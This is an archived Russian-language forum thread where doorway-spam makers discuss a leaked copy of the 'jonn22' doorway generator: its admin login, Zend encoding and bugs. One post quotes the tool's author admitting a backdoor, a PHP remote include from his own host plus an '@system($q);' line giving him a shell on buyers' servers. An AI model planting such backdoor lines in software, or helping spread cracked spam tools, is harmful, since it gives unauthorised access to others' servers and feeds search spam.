[Архив] Все что нужно дорвейщику!

Статус
В этой теме нельзя размещать новые ответы.
Valerik написал(а):
moneyonly4 написал(а):
хелп по джону Для просмотра ссылки Войди или Зарегистрируйся но вот конкретно этот пункт Для просмотра ссылки Войди или Зарегистрируйся у меня не получаетсяя там ненаписано что это за "файл заданий" какое у него должно быть имя и в какой папке!?

У кого нибудь получилось зайти в admin.php Как в хелпе:login: jonn;pass: jonn не получается.
в том что выложен jonn221 и то и другое это все меняется в конфиге

Вопрос по версии доргена jonn22 - насколько она старая?
дело в том, что на умаксе, обсуждались закладки в доргене:
" - Мдя... а еще там есть другая фишка. Джон может получить доступ к любому сайту, на котором установлен дорген....
@include 'http://jonn22.com/gen.txt';
ИМХО, очень некрасиво..."
jonn22:
"1) gen.txt
ДА я могу получить доступ к любому сайту на котором стоит дорген.
Но эта фуська стоит для другого совсем.
допустим:
есть чел который юзает генератор, но он не покупал у меня его.
Путем нехитрого кода я могу отключить его домен. И его скрпит перестанет работать. Только его.

или, например несколько раз юзал.

Стучит мне клиент и говорит мол немогу поставить, все поставил но неработает пишет то и то.
Спрашиваю. Поставил ли ты 777 на все файлы и на папку.
говорит да, поставил.
что я делаю чтобы не возиться с фтп.
вставляю туда простой код типа:
@system($q);
и через полученный шелл проверяю права на папки и файлы.

Неужели если есть возможность автору скрпита влезть в скрпит то это значит что он будет ченить ломать или воровать траф."
После этого сообщения в новых версиях вроде бы все убрали, поэтому возникает вопрос- эта версия насколько старая?

kALIAn, мы тебе, конечно, признательны за софт который ты уже выложил,
но ты бы в самом деле предупредил бы, что самая сладкая вещь в обновленном списке (дорген джона) - под зендом.
Без обид.
З.Ы. я могу 0-day релизы spamit доставать, а хуле толку, они тоже под зендом и не работают есессно.

bes555 написал(а):
kALIAn, мы тебе, конечно, признательны за софт который ты уже выложил,
но ты бы в самом деле предупредил бы, что самая сладкая вещь в обновленном списке (дорген джона) - под зендом.
Без обид.
З.Ы. я могу 0-day релизы spamit доставать, а хуле толку, они тоже под зендом и не работают есессно.
Да, я так и не смог зайти в админку(нет там конфиг файла,есть setup txt но там пароль на админку не прописан а остальное все под зендом), если у кого есть нормальный джон то поделитесь.

Valerik написал(а):
Да, я так и не смог зайти в админку(нет там конфиг файла,есть setup txt но там пароль на админку не прописан а остальное все под зендом), если у кого есть нормальный джон то поделитесь.
Вот то что у меня есть, вроде без зенда (вроди Джон..)

дак это джон или не то че я дал, кто скажет? а то я там вроде не нашел...

agronom написал(а):
дак это джон или не то че я дал, кто скажет? а то я там вроде не нашел...
Да Джон,но старенький, он уже не раз тут светился.

Valerik написал(а):
пароль и логин тебе сказали - jonn221...
впечатления - под кроном не работает вроде-бы...
запускал -1.php из броузера, вроде генерит, но через раз выдает
PHP:
Fatal error:  Call to undefined function:  getfromstr() in /pub/home/login/htdocs/sat/1.php on line 422
картинки из гугл - не тянет...

пароль и логин тебе сказали - jonn221...
Этот пароль я и сам сразу вычеслил(смотри adminp.php), дело в другом , не могу я с ним зайти в админку, с этим паролем , может конечно из за денвера, но и да бог с ним, будет время будем разбираться что к чему, а пока пусть полежит себе спокойненько.Вобще я так понял, что джона лучше на серваке тестить. Будет сервак вот тогда и посмотрим.

Valerik написал(а):
Этот пароль я и сам сразу вычеслил(смотри adminp.php), дело в другом , не могу я с ним зайти в админку, с этим паролем , может конечно из за денвера, но и да бог с ним, будет время будем разбираться что к чему, а пока пусть полежит себе спокойненько.Вобще я так понял, что джона лучше на серваке тестить. Будет сервак вот тогда и посмотрим.
джон глючной потоки размножились до 100))))))) серв упал :haha:

Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху